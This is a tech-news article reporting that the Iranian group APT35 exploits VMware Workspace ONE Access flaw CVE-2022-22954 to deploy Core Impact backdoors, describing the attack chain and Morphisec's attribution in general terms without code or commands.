Hackers exploit critical VMware RCE flaw to install backdoors, APT35, Iran, Remote Code Execution, VMware

Advanced hackers are actively exploiting a critical remote code execution (RCE) vulnerability, CVE-2022-22954, that affects in VMware Workspace ONE Access (formerly called VMware Identity Manager).

The issue was addressed in a security update 20 days ago along with two more RCEs – CVE-2022-22957 and CVE-2022-22958 that also affect VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.

Soon after the public disclosure of the flaws, proof of concept (PoC) exploit code emerged in the public space, enabling hackers leveraged to target vulnerable VMware product deployments. VMware confirmed CVE-2022-22954 exploitation in the wild.

Now, researchers at Morphisec report seeing exploitation from advanced persistent threat (APT) actors, particularly an Iranian hacking group tracked as APT35, aka “Rocket Kitten.”

Attack details

The adversaries gain initial access to the environment by exploiting CVE-2022-22954, the only one in the RCE trio that doesn’t require administrative access to the target server and also has a publicly available PoC exploit.

The attack starts with executing a PowerShell command on the vulnerable service (Identity Manager), which launches a stager.

The stager then fetches the PowerTrash loader from the command and control (C2) server in a highly obfuscated form and loads a Core Impact agent into the system memory.

Hackers exploit critical VMware RCE flaw to install backdoors, APT35, Iran, Remote Code Execution, VMware

The APT35 attack flow (Morphisec)

Core Impact is a legitimate penetration testing tool that is abused for nefarious purposes in this case, similar to how Cobalt Strike is deployed in malicious campaigns.

This isn’t a novel element, though. Trend Micro has reported Core Impact abuse in the past by APT35, the activity dating as far back as 2015.

“Morphisec research observed attackers already exploiting this vulnerability (CVE-2022-22954) to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons” – Morphisec

Morphisec CTO Michael Gorelik told BleepingComputer that the attacker tried lateral movement on the network, although the backdoor was stopped.

“With privileged access, these types of attacks may be able to bypass typical defenses including antivirus (AV) and endpoint detection and response (EDR),” Morphisec adds in the report.

Links to hosting firm

Morphisec was able to retrieve the stager server’s C2 address, the Core Impact client version, and the 256-bit encryption key used for C2 communication, and eventually linked the operation to a specific person named Ivan Neculiti.

There’s an entry on the ‘Hucksters’ fraud exposure database under that name, listing corporate entities registered in Moldova, Russia, and the UK, including a hosting firm that, according to the database, supports all kinds of illegal websites as well as spam and phishing campaigns.

It is unclear if Neculiti or the associated companies were in any way, knowingly or not, involved in cybercriminal campaigns.

BleepingComputer has contacted both hosting firms for a comment on the allegations made in Morphisec’s report, and we will update this post if we get a reply.

TECH NEWS RELATED

Marvel already confirmed Doctor Doom in the MCU, but we almost missed it

We’re nowhere near a Fantastic Four cast and release date announcement, especially considering that Marvel’s search for a new director might take some time. But we’re already getting the first MCU Fantastic Four teasers. We saw Mister Fantastic (John Krasinski) in Doctor Strange in the Multiverse of Madness, a ...

View more: Marvel already confirmed Doctor Doom in the MCU, but we almost missed it

Industry minister to visit Czech Republic, Poland for nuclear energy sales

SEOUL, June 27 (Yonhap) — South Korea’s Industry Minister Lee Chang-yang will visit the Czech Republic and Poland this week to support local firms in winning contracts for building new power plants there, his office said Monday. Lee is scheduled to make a two-day trip to the Czech Republic from ...

View more: Industry minister to visit Czech Republic, Poland for nuclear energy sales

States race to woo Foxconn as EV, Chip fab plan take shape

ETtech Foxconn, the largest and globally most trusted electronics manufacturer in the world and 22nd in the list of Fortune 500 companies is expanding into Semiconductor Manufacturing and is exploring the South Asian market for its next venture to build for the world. A slew of Indian states are wooing ...

View more: States race to woo Foxconn as EV, Chip fab plan take shape

Payments Council seeks government help post RBI’s fintech order

The Payments Council of India (PCI) and several fintech firms have urged the government to step in to resolve the fallout from a recent directive by the Reserve Bank of India (RBI) that barred payment companies from loading credit lines onto wallets and prepaid payment instruments (PPIs).The council – under ...

View more: Payments Council seeks government help post RBI’s fintech order

TCS eyes non-metro offices to move closer to tech talent

Tata Consultancy Services (TCS) will set up offices in small cities and non-metro regions including Guwahati, Nagpur and Goa to get employees back into offices. This is aimed at encouraging collaboration among staff members as many are reluctant to go back to their base locations after working out of home, ...

View more: TCS eyes non-metro offices to move closer to tech talent

Influencers cry foul over delayed pay at Trell; 100 more staff leave firm amid troubles

Mumbai: Influencer-led video commerce platform Trell has not paid its dues to a section of content creators for the last 6-7 months, three creators told ET.About 100 employees of Trell have also voluntarily left the company over the last two months, a source familiar with the developments said.Trell, which was ...

View more: Influencers cry foul over delayed pay at Trell; 100 more staff leave firm amid troubles

Reliance, PremjiInvest, CP Group, Swiggy look to bid for Metro India unit

Mumbai/New Delhi: Reliance Retail, Thailand’s largest conglomerate Charoen Pokphand (CP) Group and food and grocery delivery platform Swiggy are competing with PremjiInvest, the investment fund managed by the family office of Indian tech billionaire Azim Premji, to buy the Indian cash-and-carry operations of German retailer Metro AG, said multiple people ...

View more: Reliance, PremjiInvest, CP Group, Swiggy look to bid for Metro India unit

Nissan Leaf celebrates 10 years of sales in Australia

The Nissan Leaf has spent ten years on sale in Australia. Nissan’s electric Leaf has been on sale for 10 years in Australia this June, having first gone on sale in 2012, two years after its international debut. Now in its second generation, the electric car is undoubtedly a ...

View more: Nissan Leaf celebrates 10 years of sales in Australia

Regenerative braking efficiency is the hot new topic

McMurtry confirm road-legal version of electric fan car

Aiways confirms right-hand drive expansion

Tips For Hiring An IT Expert

China questions the safety of open source code amid sanctions and tech dependency risks, but can it build a viable alternative?

2023 Range Rover Sport V8 Ride-Along Review

All for pride, pride for all Pride Month in Thailand saw both advocates and opportunists waving rainbow flags, while a bill that can pave the way for same-sex marriage moved forward

Energetic eco An upgraded Almera provides a ride that belies its diminutive displacement

Lanzante to build more radical supercars

Maserati looks to the heavens with new convertible

NHL Stanley Cup Final Game 6: How to Watch Lightning vs. Avalanche Live

Robin Shute Wins 100th Pikes Peak International Hill Climb

OTHER TECH NEWS

Top Car News Car News